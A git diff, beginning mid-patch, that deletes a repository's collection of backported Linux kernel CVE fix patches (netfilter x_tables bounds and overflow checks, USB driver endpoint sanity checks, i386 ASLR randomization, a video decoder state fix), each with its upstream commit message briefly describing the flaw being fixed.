Other VM counters will be -@@ -380,13 +396,19 @@ static int migrate_page_move_mapping(struct address_space *mapping, - * via NR_FILE_PAGES and NR_ANON_PAGES if they - * are mapped to swap space. - */ -- __dec_zone_page_state(page, NR_FILE_PAGES); -- __inc_zone_page_state(newpage, NR_FILE_PAGES); -- if (!PageSwapCache(page) && PageSwapBacked(page)) { -- __dec_zone_page_state(page, NR_SHMEM); -- __inc_zone_page_state(newpage, NR_SHMEM); -+ if (newzone != oldzone) { -+ __dec_zone_state(oldzone, NR_FILE_PAGES); -+ __inc_zone_state(newzone, NR_FILE_PAGES); -+ if (PageSwapBacked(page) && !PageSwapCache(page)) { -+ __dec_zone_state(oldzone, NR_SHMEM); -+ __inc_zone_state(newzone, NR_SHMEM); -+ } -+ if (dirty && mapping_cap_account_dirty(mapping)) { -+ __dec_zone_state(oldzone, NR_FILE_DIRTY); -+ __inc_zone_state(newzone, NR_FILE_DIRTY); -+ } - } -- spin_unlock_irq(&mapping->tree_lock); -+ local_irq_enable(); - - return MIGRATEPAGE_SUCCESS; - } -@@ -460,20 +482,9 @@ void migrate_page_copy(struct page *newpage, struct page *page) - if (PageMappedToDisk(page)) - SetPageMappedToDisk(newpage); - -- if (PageDirty(page)) { -- clear_page_dirty_for_io(page); -- /* -- * Want to mark the page and the radix tree as dirty, and -- * redo the accounting that clear_page_dirty_for_io undid, -- * but we can't use set_page_dirty because that function -- * is actually a signal that all of the page has become dirty. -- * Whereas only part of our page may be dirty. -- */ -- if (PageSwapBacked(page)) -- SetPageDirty(newpage); -- else -- __set_page_dirty_nobuffers(newpage); -- } -+ /* Move dirty on pages not done by migrate_page_move_mapping() */ -+ if (PageDirty(page)) -+ SetPageDirty(newpage); - - mlock_migrate_page(newpage, page); - ksm_migrate_page(newpage, page); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch deleted file mode 100644 index 87dd172a..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch +++ /dev/null 
@@ -1,234 +0,0 @@ -From 54d83fc74aa9ec72794373cb47432c5f7fb1a309 Mon Sep 17 00:00:00 2001 -From: Florian Westphal -Date: Tue, 22 Mar 2016 18:02:52 +0100 -Subject: netfilter: x_tables: fix unconditional helper - -Ben Hawkes says: - - In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it - is possible for a user-supplied ipt_entry structure to have a large - next_offset field. This field is not bounds checked prior to writing a - counter value at the supplied offset. - -Problem is that mark_source_chains should not have been called -- -the rule doesn't have a next entry, so its supposed to return -an absolute verdict of either ACCEPT or DROP. - -However, the function conditional() doesn't work as the name implies. -It only checks that the rule is using wildcard address matching. - -However, an unconditional rule must also not be using any matches -(no -m args). - -The underflow validator only checked the addresses, therefore -passing the 'unconditional absolute verdict' test, while -mark_source_chains also tested for presence of matches, and thus -proceeeded to the next (not-existent) rule. - -Unify this so that all the callers have same idea of 'unconditional rule'. - -Reported-by: Ben Hawkes -Signed-off-by: Florian Westphal -Signed-off-by: Pablo Neira Ayuso ---- - net/ipv4/netfilter/arp_tables.c | 18 +++++++++--------- - net/ipv4/netfilter/ip_tables.c | 23 +++++++++++------------ - net/ipv6/netfilter/ip6_tables.c | 23 +++++++++++------------ - 3 files changed, 31 insertions(+), 33 deletions(-) - -diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c -index 51d4fe5..a1bb5e7 100644 ---- a/net/ipv4/netfilter/arp_tables.c -+++ b/net/ipv4/netfilter/arp_tables.c -@@ -359,11 +359,12 @@ unsigned int arpt_do_table(struct sk_buff *skb, - } - - /* All zeroes == unconditional rule. 
*/ --static inline bool unconditional(const struct arpt_arp *arp) -+static inline bool unconditional(const struct arpt_entry *e) - { - static const struct arpt_arp uncond; - -- return memcmp(arp, &uncond, sizeof(uncond)) == 0; -+ return e->target_offset == sizeof(struct arpt_entry) && -+ memcmp(&e->arp, &uncond, sizeof(uncond)) == 0; - } - - /* Figures out from what hook each rule can be called: returns 0 if -@@ -402,11 +403,10 @@ static int mark_source_chains(const struct xt_table_info *newinfo, - |= ((1 << hook) | (1 << NF_ARP_NUMHOOKS)); - - /* Unconditional return/END. */ -- if ((e->target_offset == sizeof(struct arpt_entry) && -+ if ((unconditional(e) && - (strcmp(t->target.u.user.name, - XT_STANDARD_TARGET) == 0) && -- t->verdict < 0 && unconditional(&e->arp)) || -- visited) { -+ t->verdict < 0) || visited) { - unsigned int oldpos, size; - - if ((strcmp(t->target.u.user.name, -@@ -551,7 +551,7 @@ static bool check_underflow(const struct arpt_entry *e) - const struct xt_entry_target *t; - unsigned int verdict; - -- if (!unconditional(&e->arp)) -+ if (!unconditional(e)) - return false; - t = arpt_get_target_c(e); - if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0) -@@ -598,9 +598,9 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e, - newinfo->hook_entry[h] = hook_entries[h]; - if ((unsigned char *)e - base == underflows[h]) { - if (!check_underflow(e)) { -- pr_err("Underflows must be unconditional and " -- "use the STANDARD target with " -- "ACCEPT/DROP\n"); -+ pr_debug("Underflows must be unconditional and " -+ "use the STANDARD target with " -+ "ACCEPT/DROP\n"); - return -EINVAL; - } - newinfo->underflow[h] = underflows[h]; -diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c -index fb7694e6..89b5d95 100644 ---- a/net/ipv4/netfilter/ip_tables.c -+++ b/net/ipv4/netfilter/ip_tables.c -@@ -168,11 +168,12 @@ get_entry(const void *base, unsigned int offset) - - /* All zeroes == unconditional rule. 
*/ - /* Mildly perf critical (only if packet tracing is on) */ --static inline bool unconditional(const struct ipt_ip *ip) -+static inline bool unconditional(const struct ipt_entry *e) - { - static const struct ipt_ip uncond; - -- return memcmp(ip, &uncond, sizeof(uncond)) == 0; -+ return e->target_offset == sizeof(struct ipt_entry) && -+ memcmp(&e->ip, &uncond, sizeof(uncond)) == 0; - #undef FWINV - } - -@@ -229,11 +230,10 @@ get_chainname_rulenum(const struct ipt_entry *s, const struct ipt_entry *e, - } else if (s == e) { - (*rulenum)++; - -- if (s->target_offset == sizeof(struct ipt_entry) && -+ if (unconditional(s) && - strcmp(t->target.u.kernel.target->name, - XT_STANDARD_TARGET) == 0 && -- t->verdict < 0 && -- unconditional(&s->ip)) { -+ t->verdict < 0) { - /* Tail of chains: STANDARD target (return/policy) */ - *comment = *chainname == hookname - ? comments[NF_IP_TRACE_COMMENT_POLICY] -@@ -476,11 +476,10 @@ mark_source_chains(const struct xt_table_info *newinfo, - e->comefrom |= ((1 << hook) | (1 << NF_INET_NUMHOOKS)); - - /* Unconditional return/END. 
*/ -- if ((e->target_offset == sizeof(struct ipt_entry) && -+ if ((unconditional(e) && - (strcmp(t->target.u.user.name, - XT_STANDARD_TARGET) == 0) && -- t->verdict < 0 && unconditional(&e->ip)) || -- visited) { -+ t->verdict < 0) || visited) { - unsigned int oldpos, size; - - if ((strcmp(t->target.u.user.name, -@@ -715,7 +714,7 @@ static bool check_underflow(const struct ipt_entry *e) - const struct xt_entry_target *t; - unsigned int verdict; - -- if (!unconditional(&e->ip)) -+ if (!unconditional(e)) - return false; - t = ipt_get_target_c(e); - if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0) -@@ -763,9 +762,9 @@ check_entry_size_and_hooks(struct ipt_entry *e, - newinfo->hook_entry[h] = hook_entries[h]; - if ((unsigned char *)e - base == underflows[h]) { - if (!check_underflow(e)) { -- pr_err("Underflows must be unconditional and " -- "use the STANDARD target with " -- "ACCEPT/DROP\n"); -+ pr_debug("Underflows must be unconditional and " -+ "use the STANDARD target with " -+ "ACCEPT/DROP\n"); - return -EINVAL; - } - newinfo->underflow[h] = underflows[h]; -diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c -index b248528f..541b59f 100644 ---- a/net/ipv6/netfilter/ip6_tables.c -+++ b/net/ipv6/netfilter/ip6_tables.c -@@ -198,11 +198,12 @@ get_entry(const void *base, unsigned int offset) - - /* All zeroes == unconditional rule. 
*/ - /* Mildly perf critical (only if packet tracing is on) */ --static inline bool unconditional(const struct ip6t_ip6 *ipv6) -+static inline bool unconditional(const struct ip6t_entry *e) - { - static const struct ip6t_ip6 uncond; - -- return memcmp(ipv6, &uncond, sizeof(uncond)) == 0; -+ return e->target_offset == sizeof(struct ip6t_entry) && -+ memcmp(&e->ipv6, &uncond, sizeof(uncond)) == 0; - } - - static inline const struct xt_entry_target * -@@ -258,11 +259,10 @@ get_chainname_rulenum(const struct ip6t_entry *s, const struct ip6t_entry *e, - } else if (s == e) { - (*rulenum)++; - -- if (s->target_offset == sizeof(struct ip6t_entry) && -+ if (unconditional(s) && - strcmp(t->target.u.kernel.target->name, - XT_STANDARD_TARGET) == 0 && -- t->verdict < 0 && -- unconditional(&s->ipv6)) { -+ t->verdict < 0) { - /* Tail of chains: STANDARD target (return/policy) */ - *comment = *chainname == hookname - ? comments[NF_IP6_TRACE_COMMENT_POLICY] -@@ -488,11 +488,10 @@ mark_source_chains(const struct xt_table_info *newinfo, - e->comefrom |= ((1 << hook) | (1 << NF_INET_NUMHOOKS)); - - /* Unconditional return/END. 
*/ -- if ((e->target_offset == sizeof(struct ip6t_entry) && -+ if ((unconditional(e) && - (strcmp(t->target.u.user.name, - XT_STANDARD_TARGET) == 0) && -- t->verdict < 0 && -- unconditional(&e->ipv6)) || visited) { -+ t->verdict < 0) || visited) { - unsigned int oldpos, size; - - if ((strcmp(t->target.u.user.name, -@@ -727,7 +726,7 @@ static bool check_underflow(const struct ip6t_entry *e) - const struct xt_entry_target *t; - unsigned int verdict; - -- if (!unconditional(&e->ipv6)) -+ if (!unconditional(e)) - return false; - t = ip6t_get_target_c(e); - if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0) -@@ -775,9 +774,9 @@ check_entry_size_and_hooks(struct ip6t_entry *e, - newinfo->hook_entry[h] = hook_entries[h]; - if ((unsigned char *)e - base == underflows[h]) { - if (!check_underflow(e)) { -- pr_err("Underflows must be unconditional and " -- "use the STANDARD target with " -- "ACCEPT/DROP\n"); -+ pr_debug("Underflows must be unconditional and " -+ "use the STANDARD target with " -+ "ACCEPT/DROP\n"); - return -EINVAL; - } - newinfo->underflow[h] = underflows[h]; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch deleted file mode 100644 index 97ba8166..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch +++ /dev/null 
@@ -1,34 +0,0 @@ -From d157bd761585605b7882935ffb86286919f62ea1 Mon Sep 17 00:00:00 2001 -From: Florian Westphal -Date: Thu, 10 Mar 2016 01:56:23 +0100 -Subject: netfilter: x_tables: check for size overflow - -Ben Hawkes says: - integer overflow in xt_alloc_table_info, which on 32-bit systems can - lead to small structure allocation and a copy_from_user based heap - corruption. - -Reported-by: Ben Hawkes -Signed-off-by: Florian Westphal -Signed-off-by: Pablo Neira Ayuso ---- - net/netfilter/x_tables.c | 3 +++ - 1 file changed, 3 insertions(+) - -diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c -index d0cd2b9..582c9cf 100644 ---- a/net/netfilter/x_tables.c -+++ b/net/netfilter/x_tables.c -@@ -659,6 +659,9 @@ struct xt_table_info *xt_alloc_table_info(unsigned int size) - struct xt_table_info *info = NULL; - size_t sz = sizeof(*info) + size; - -+ if (sz < sizeof(*info)) -+ return NULL; -+ - /* Pedantry: prevent them from hitting BUG() in vmalloc.c --RR */ - if ((SMP_ALIGN(size) >> PAGE_SHIFT) + 2 > totalram_pages) - return NULL; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch deleted file mode 100644 index 2809018d..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch +++ /dev/null 
@@ -1,49 +0,0 @@ -From 4e9a0b05257f29cf4b75f3209243ed71614d062e Mon Sep 17 00:00:00 2001 -From: Oliver Neukum -Date: Thu, 31 Mar 2016 12:04:24 -0400 -Subject: USB: mct_u232: add sanity checking in probe - -An attack using the lack of sanity checking in probe is known. This -patch checks for the existence of a second port. - -CVE-2016-3136 - -Signed-off-by: Oliver Neukum -CC: stable@vger.kernel.org -[johan: add error message ] -Signed-off-by: Johan Hovold -Signed-off-by: Greg Kroah-Hartman ---- - drivers/usb/serial/mct_u232.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/drivers/usb/serial/mct_u232.c b/drivers/usb/serial/mct_u232.c -index 4446b8d..8856553 100644 ---- a/drivers/usb/serial/mct_u232.c -+++ b/drivers/usb/serial/mct_u232.c -@@ -376,14 +376,21 @@ static void mct_u232_msr_to_state(struct usb_serial_port *port, - - static int mct_u232_port_probe(struct usb_serial_port *port) - { -+ struct usb_serial *serial = port->serial; - struct mct_u232_private *priv; - -+ /* check first to simplify error handling */ -+ if (!serial->port[1] || !serial->port[1]->interrupt_in_urb) { -+ dev_err(&port->dev, "expected endpoint missing\n"); -+ return -ENODEV; -+ } -+ - priv = kzalloc(sizeof(*priv), GFP_KERNEL); - if (!priv) - return -ENOMEM; - - /* Use second interrupt-in endpoint for reading. */ -- priv->read_urb = port->serial->port[1]->interrupt_in_urb; -+ priv->read_urb = serial->port[1]->interrupt_in_urb; - priv->read_urb->context = port; - - spin_lock_init(&priv->lock); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch deleted file mode 100644 index c54514e3..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch +++ /dev/null 
@@ -1,49 +0,0 @@ -From c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754 Mon Sep 17 00:00:00 2001 -From: Oliver Neukum -Date: Thu, 31 Mar 2016 12:04:25 -0400 -Subject: USB: cypress_m8: add endpoint sanity check - -An attack using missing endpoints exists. - -CVE-2016-3137 - -Signed-off-by: Oliver Neukum -CC: stable@vger.kernel.org -Signed-off-by: Johan Hovold -Signed-off-by: Greg Kroah-Hartman ---- - drivers/usb/serial/cypress_m8.c | 11 +++++------ - 1 file changed, 5 insertions(+), 6 deletions(-) - -diff --git a/drivers/usb/serial/cypress_m8.c b/drivers/usb/serial/cypress_m8.c -index b283eb8..bbeeb2b 100644 ---- a/drivers/usb/serial/cypress_m8.c -+++ b/drivers/usb/serial/cypress_m8.c -@@ -447,6 +447,11 @@ static int cypress_generic_port_probe(struct usb_serial_port *port) - struct usb_serial *serial = port->serial; - struct cypress_private *priv; - -+ if (!port->interrupt_out_urb || !port->interrupt_in_urb) { -+ dev_err(&port->dev, "required endpoint is missing\n"); -+ return -ENODEV; -+ } -+ - priv = kzalloc(sizeof(struct cypress_private), GFP_KERNEL); - if (!priv) - return -ENOMEM; -@@ -606,12 +611,6 @@ static int cypress_open(struct tty_struct *tty, struct usb_serial_port *port) - cypress_set_termios(tty, port, &priv->tmp_termios); - - /* setup the port and start reading from the device */ -- if (!port->interrupt_in_urb) { -- dev_err(&port->dev, "%s - interrupt_in_urb is empty!\n", -- __func__); -- return -1; -- } -- - usb_fill_int_urb(port->interrupt_in_urb, serial->dev, - usb_rcvintpipe(serial->dev, port->interrupt_in_endpointAddress), - port->interrupt_in_urb->transfer_buffer, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch deleted file mode 100644 index 0abd439f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch +++ /dev/null 
@@ -1,34 +0,0 @@ -From 8835ba4a39cf53f705417b3b3a94eb067673f2c9 Mon Sep 17 00:00:00 2001 -From: Oliver Neukum -Date: Tue, 15 Mar 2016 10:14:04 +0100 -Subject: USB: cdc-acm: more sanity checking - -An attack has become available which pretends to be a quirky -device circumventing normal sanity checks and crashes the kernel -by an insufficient number of interfaces. This patch adds a check -to the code path for quirky devices. - -Signed-off-by: Oliver Neukum -CC: stable@vger.kernel.org -Signed-off-by: Greg Kroah-Hartman ---- - drivers/usb/class/cdc-acm.c | 3 +++ - 1 file changed, 3 insertions(+) - -diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c -index 1d2c99a..83fd30b 100644 ---- a/drivers/usb/class/cdc-acm.c -+++ b/drivers/usb/class/cdc-acm.c -@@ -1179,6 +1179,9 @@ static int acm_probe(struct usb_interface *intf, - if (quirks == NO_UNION_NORMAL) { - data_interface = usb_ifnum_to_if(usb_dev, 1); - control_interface = usb_ifnum_to_if(usb_dev, 0); -+ /* we would crash */ -+ if (!data_interface || !control_interface) -+ return -ENODEV; - goto skip_normal_probe; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch deleted file mode 100644 index 21067f69..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch +++ /dev/null 
@@ -1,54 +0,0 @@ -From 5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f Mon Sep 17 00:00:00 2001 -From: Oliver Neukum -Date: Thu, 31 Mar 2016 12:04:26 -0400 -Subject: USB: digi_acceleport: do sanity checking for the number of ports - -The driver can be crashed with devices that expose crafted descriptors -with too few endpoints. - -See: http://seclists.org/bugtraq/2016/Mar/61 - -Signed-off-by: Oliver Neukum -[johan: fix OOB endpoint check and add error messages ] -Cc: stable -Signed-off-by: Johan Hovold -Signed-off-by: Greg Kroah-Hartman ---- - drivers/usb/serial/digi_acceleport.c | 19 +++++++++++++++++++ - 1 file changed, 19 insertions(+) - -diff --git a/drivers/usb/serial/digi_acceleport.c b/drivers/usb/serial/digi_acceleport.c -index 010a42a..16e8e37 100644 ---- a/drivers/usb/serial/digi_acceleport.c -+++ b/drivers/usb/serial/digi_acceleport.c -@@ -1251,8 +1251,27 @@ static int digi_port_init(struct usb_serial_port *port, unsigned port_num) - - static int digi_startup(struct usb_serial *serial) - { -+ struct device *dev = &serial->interface->dev; - struct digi_serial *serial_priv; - int ret; -+ int i; -+ -+ /* check whether the device has the expected number of endpoints */ -+ if (serial->num_port_pointers < serial->type->num_ports + 1) { -+ dev_err(dev, "OOB endpoints missing\n"); -+ return -ENODEV; -+ } -+ -+ for (i = 0; i < serial->type->num_ports + 1 ; i++) { -+ if (!serial->port[i]->read_urb) { -+ dev_err(dev, "bulk-in endpoint missing\n"); -+ return -ENODEV; -+ } -+ if (!serial->port[i]->write_urb) { -+ dev_err(dev, "bulk-out endpoint missing\n"); -+ return -ENODEV; -+ } -+ } - - serial_priv = kzalloc(sizeof(*serial_priv), GFP_KERNEL); - if (!serial_priv) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch deleted file mode 100644 index 176b4f71..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch +++ /dev/null 
@@ -1,97 +0,0 @@ -From fbd40ea0180a2d328c5adc61414dc8bab9335ce2 Mon Sep 17 00:00:00 2001 -From: "David S. Miller" -Date: Sun, 13 Mar 2016 23:28:00 -0400 -Subject: ipv4: Don't do expensive useless work during inetdev destroy. - -When an inetdev is destroyed, every address assigned to the interface -is removed. And in this scenerio we do two pointless things which can -be very expensive if the number of assigned interfaces is large: - -1) Address promotion. We are deleting all addresses, so there is no - point in doing this. - -2) A full nf conntrack table purge for every address. We only need to - do this once, as is already caught by the existing - masq_dev_notifier so masq_inet_event() can skip this. - -Reported-by: Solar Designer -Signed-off-by: David S. Miller -Tested-by: Cyrill Gorcunov ---- - net/ipv4/devinet.c | 4 ++++ - net/ipv4/fib_frontend.c | 4 ++++ - net/ipv4/netfilter/nf_nat_masquerade_ipv4.c | 12 ++++++++++-- - 3 files changed, 18 insertions(+), 2 deletions(-) - -diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c -index 65e76a4..e333bc8 100644 ---- a/net/ipv4/devinet.c -+++ b/net/ipv4/devinet.c -@@ -334,6 +334,9 @@ static void __inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, - - ASSERT_RTNL(); - -+ if (in_dev->dead) -+ goto no_promotions; -+ - /* 1. Deleting primary ifaddr forces deletion all secondaries - * unless alias promotion is set - **/ -@@ -380,6 +383,7 @@ static void __inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, - fib_del_ifaddr(ifa, ifa1); - } - -+no_promotions: - /* 2. Unlink it */ - - *ifap = ifa1->ifa_next; -diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c -index 4734475..21add55 100644 ---- a/net/ipv4/fib_frontend.c -+++ b/net/ipv4/fib_frontend.c -@@ -922,6 +922,9 @@ void fib_del_ifaddr(struct in_ifaddr *ifa, struct in_ifaddr *iprim) - subnet = 1; - } - -+ if (in_dev->dead) -+ goto no_promotions; -+ - /* Deletion is more complicated than add. 
- * We should take care of not to delete too much :-) - * -@@ -997,6 +1000,7 @@ void fib_del_ifaddr(struct in_ifaddr *ifa, struct in_ifaddr *iprim) - } - } - -+no_promotions: - if (!(ok & BRD_OK)) - fib_magic(RTM_DELROUTE, RTN_BROADCAST, ifa->ifa_broadcast, 32, prim); - if (subnet && ifa->ifa_prefixlen < 31) { -diff --git a/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c b/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c -index c6eb421..ea91058 100644 ---- a/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c -+++ b/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c -@@ -108,10 +108,18 @@ static int masq_inet_event(struct notifier_block *this, - unsigned long event, - void *ptr) - { -- struct net_device *dev = ((struct in_ifaddr *)ptr)->ifa_dev->dev; -+ struct in_device *idev = ((struct in_ifaddr *)ptr)->ifa_dev; - struct netdev_notifier_info info; - -- netdev_notifier_info_init(&info, dev); -+ /* The masq_dev_notifier will catch the case of the device going -+ * down. So if the inetdev is dead and being destroyed we have -+ * no work to do. Otherwise this is an individual address removal -+ * and we have to perform the flush. -+ */ -+ if (idev->dead) -+ return NOTIFY_DONE; -+ -+ netdev_notifier_info_init(&info, idev->dev); - return masq_device_event(this, event, &info); - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch deleted file mode 100644 index de810f0b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch +++ /dev/null 
@@ -1,83 +0,0 @@ -From 8b8addf891de8a00e4d39fc32f93f7c5eb8feceb Mon Sep 17 00:00:00 2001 -From: Hector Marco-Gisbert -Date: Thu, 10 Mar 2016 20:51:00 +0100 -Subject: x86/mm/32: Enable full randomization on i386 and X86_32 - -Currently on i386 and on X86_64 when emulating X86_32 in legacy mode, only -the stack and the executable are randomized but not other mmapped files -(libraries, vDSO, etc.). This patch enables randomization for the -libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. - -By default on i386 there are 8 bits for the randomization of the libraries, -vDSO and mmaps which only uses 1MB of VA. - -This patch preserves the original randomness, using 1MB of VA out of 3GB or -4GB. We think that 1MB out of 3GB is not a big cost for having the ASLR. - -The first obvious security benefit is that all objects are randomized (not -only the stack and the executable) in legacy mode which highly increases -the ASLR effectiveness, otherwise the attackers may use these -non-randomized areas. But also sensitive setuid/setgid applications are -more secure because currently, attackers can disable the randomization of -these applications by setting the ulimit stack to "unlimited". This is a -very old and widely known trick to disable the ASLR in i386 which has been -allowed for too long. - -Another trick used to disable the ASLR was to set the ADDR_NO_RANDOMIZE -personality flag, but fortunately this doesn't work on setuid/setgid -applications because there is security checks which clear Security-relevant -flags. - -This patch always randomizes the mmap_legacy_base address, removing the -possibility to disable the ASLR by setting the stack to "unlimited". 
- -Signed-off-by: Hector Marco-Gisbert -Acked-by: Ismael Ripoll Ripoll -Acked-by: Kees Cook -Acked-by: Arjan van de Ven -Cc: Linus Torvalds -Cc: Peter Zijlstra -Cc: Thomas Gleixner -Cc: akpm@linux-foundation.org -Cc: kees Cook -Link: http://lkml.kernel.org/r/1457639460-5242-1-git-send-email-hecmargi@upv.es -Signed-off-by: Ingo Molnar ---- - arch/x86/mm/mmap.c | 14 +------------- - 1 file changed, 1 insertion(+), 13 deletions(-) - -diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c -index 96bd1e2..389939f 100644 ---- a/arch/x86/mm/mmap.c -+++ b/arch/x86/mm/mmap.c -@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd) - } - - /* -- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64 -- * does, but not when emulating X86_32 -- */ --static unsigned long mmap_legacy_base(unsigned long rnd) --{ -- if (mmap_is_ia32()) -- return TASK_UNMAPPED_BASE; -- else -- return TASK_UNMAPPED_BASE + rnd; --} -- --/* - * This function, called very early during the creation of a new - * process VM image, sets up which VM layout function to use: - */ -@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm) - if (current->flags & PF_RANDOMIZE) - random_factor = arch_mmap_rnd(); - -- mm->mmap_legacy_base = mmap_legacy_base(random_factor); -+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor; - - if (mmap_is_legacy()) { - mm->mmap_base = mm->mmap_legacy_base; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch deleted file mode 100644 index 5c5c1bce..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch +++ /dev/null 
@@ -1,40 +0,0 @@ -From a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff Mon Sep 17 00:00:00 2001 -From: Oliver Neukum -Date: Thu, 17 Mar 2016 14:00:17 -0700 -Subject: Input: ims-pcu - sanity check against missing interfaces - -A malicious device missing interface can make the driver oops. -Add sanity checking. - -Signed-off-by: Oliver Neukum -CC: stable@vger.kernel.org -Signed-off-by: Dmitry Torokhov ---- - drivers/input/misc/ims-pcu.c | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c -index ac1fa5f..9c0ea36 100644 ---- a/drivers/input/misc/ims-pcu.c -+++ b/drivers/input/misc/ims-pcu.c -@@ -1663,6 +1663,8 @@ static int ims_pcu_parse_cdc_data(struct usb_interface *intf, struct ims_pcu *pc - - pcu->ctrl_intf = usb_ifnum_to_if(pcu->udev, - union_desc->bMasterInterface0); -+ if (!pcu->ctrl_intf) -+ return -EINVAL; - - alt = pcu->ctrl_intf->cur_altsetting; - pcu->ep_ctrl = &alt->endpoint[0].desc; -@@ -1670,6 +1672,8 @@ static int ims_pcu_parse_cdc_data(struct usb_interface *intf, struct ims_pcu *pc - - pcu->data_intf = usb_ifnum_to_if(pcu->udev, - union_desc->bSlaveInterface0); -+ if (!pcu->data_intf) -+ return -EINVAL; - - alt = pcu->data_intf->cur_altsetting; - if (alt->desc.bNumEndpoints != 2) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch deleted file mode 100644 index 1bf7d443..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch +++ /dev/null 
@@ -1,162 +0,0 @@ -From c2e66c4ee83b4264d691d8aaabb2e94744df1e25 Mon Sep 17 00:00:00 2001 -From: Praveen Chavan -Date: Mon, 25 Apr 2016 10:03:42 -0700 -Subject: mm-video-v4l2: vdec: Avoid processing ETBs/FTBs in invalid states - -(per the spec) ETB/FTB should not be handled in states other than -Executing, Paused and Idle. This avoids accessing invalid buffers. -Also add a lock to protect the private-buffers from being deleted -while accessing from another thread. - -Bug: 27890802 -Security Vulnerability - Heap Use-After-Free and Possible LPE in -MediaServer (libOmxVdec problem #6) - -CRs-Fixed: 1008882 - -Change-Id: Iaac2e383cd53cf9cf8042c9ed93ddc76dba3907e ---- - mm-video-v4l2/vidc/common/inc/vidc_debug.h | 14 +++++++++++ - mm-video-v4l2/vidc/vdec/inc/omx_vdec.h | 1 + - mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp | 32 +++++++++++++++++------- - 3 files changed, 38 insertions(+), 9 deletions(-) - -diff --git a/mm-video-v4l2/vidc/common/inc/vidc_debug.h b/mm-video-v4l2/vidc/common/inc/vidc_debug.h -index 0ce747c..d9007f2 100644 ---- a/mm-video-v4l2/vidc/common/inc/vidc_debug.h -+++ b/mm-video-v4l2/vidc/common/inc/vidc_debug.h -@@ -31,6 +31,7 @@ ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
